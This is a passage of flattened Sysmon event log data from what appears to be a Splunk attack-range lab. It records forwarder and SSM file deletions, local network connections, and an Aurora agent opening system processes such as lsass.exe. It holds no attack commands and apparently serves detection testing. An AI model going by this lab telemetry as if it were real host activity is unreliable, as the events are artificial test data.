Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=51440F8341123F2CD9D1BB1A565B9A02,SHA256=58816F250BFEFB1C774320F21F2B852A8F43D6DAF2CC8BBD9773AB8334C58EAB,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000044272Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:44.701{FE4C2B44-DA6F-63C7-DB00-00000000AF02}4048C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56379-false10.0.1.12-8000- 23542300x800000000000000044271Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:47.070{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=47FBBEB4A61799EF9B617D4CE574EFEB,SHA256=2A5A30BFF571C3E757F1006370ACF0FC90152AF40714A20E45F20335A2BB36C4,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000017012Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:48.080{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=574B7B5148BB6F5F59CDA5190D7ADF8E,SHA256=48604B203CB74510B6BA5C6624622782623E54F75FAB6B7992E2E484050940D6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044273Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:48.170{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EC2E9B339E3B998700624F553B334B8B,SHA256=0BA08822C26BDE215F47CBF2F6CEB4B5F8AE73678E43AF0825EDE23B67A0710C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000017014Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:47.959{E5A8D418-DCC7-63C7-D000-00000000B002}3144C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ctus-attack-range-933.us-east-2.compute.internal50117-false10.0.1.12ip-10-0-1-12.us-east-2.compute.internal8000- 23542300x800000000000000017013Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:49.161{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FDA7AFB602CCC8F3EE9872616BAD81EB,SHA256=FF7FCB538E900D2609E9AACD637AC5A6AFE5B5E2BEB0617B76A3C935C8C86A69,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044275Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:49.256{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0419E111FF466C5DCCF521A6D9248690,SHA256=7171498036E37A7899CEDFD6FA6BC2D794589F40AEAB9626316F76877A0ABF3E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000044274Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:49.207{FE4C2B44-DA03-63C7-2400-00000000AF02}2492NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-08771daebc39497be\channels\health\respondent-20230118113741-044MD5=F3A77350075DBB208FEC17E5163EBA2F,SHA256=8E104D4FA3B2A2E0F7792F9479E83164AF9BF75506FCB23760AA4A41EC5F846D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000017015Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:50.255{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=78591E16CCF3881610F7F4B2C49F323A,SHA256=C0AE6BDFE7E0C6FC2546541586298CD29776164E43DB0AFCF8B982BC93CAE58E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044277Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:50.249{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=76B01541C54C614F92185DB046F53C21,SHA256=A03120B410E1A6E0658C8D1471145311167B1BF3E3C8DB3B5F65E4531FF5D9F0,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000044276Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:50.220{FE4C2B44-DA03-63C7-2400-00000000AF02}2492NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-08771daebc39497be\channels\health\surveyor-20230118113739-045MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000017016Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:51.333{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C7CF77EC4CB5DEE47E4266049A33B660,SHA256=DD3734BB4FF43741558042A7EBE2857143EBFC9CE95AA3B12AF1AE0AC7ED5CD1,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000044302Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:51.898{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2700-00000000AF02}2624C:\Windows\system32\dns.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000044301Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:51.896{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2400-00000000AF02}2492C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000044300Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:51.891{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2500-00000000AF02}2500C:\Windows\system32\DFSRs.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000044299Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:51.890{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2200-00000000AF02}2476C:\Windows\System32\ismserv.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000044298Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:51.886{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2100-00000000AF02}2468C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000044297Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:51.876{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-1F00-00000000AF02}2444C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000044296Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:51.871{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000044295Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:51.866{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-1E00-00000000AF02}2352C:\Windows\System32\spoolsv.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000044294Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:51.863{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9FF-63C7-1C00-00000000AF02}2208C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000044293Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:51.862{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F6-63C7-1A00-00000000AF02}1436C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000044292Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:51.860{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1700-00000000AF02}1412C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000044291Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:51.834{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1600-00000000AF02}1296C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000044290Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:51.825{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1500-00000000AF02}1268C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000044289Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:51.820{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1400-00000000AF02}1060C:\Windows\system32\dwm.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000044288Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:51.808{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1300-00000000AF02}1036C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000044287Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:51.802{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1200-00000000AF02}756C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000044286Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:51.794{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1100-00000000AF02}492C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000044285Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:51.786{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1000-00000000AF02}404C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000044284Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:51.776{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-0F00-00000000AF02}304C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000044283Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:51.770{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-0E00-00000000AF02}1004C:\Windows\system32\LogonUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000044282Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:51.763{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-0D00-00000000AF02}892C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000044281Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:51.756{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000044280Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:51.725{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624C:\Windows\system32\lsass.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000044279Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:51.722{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program 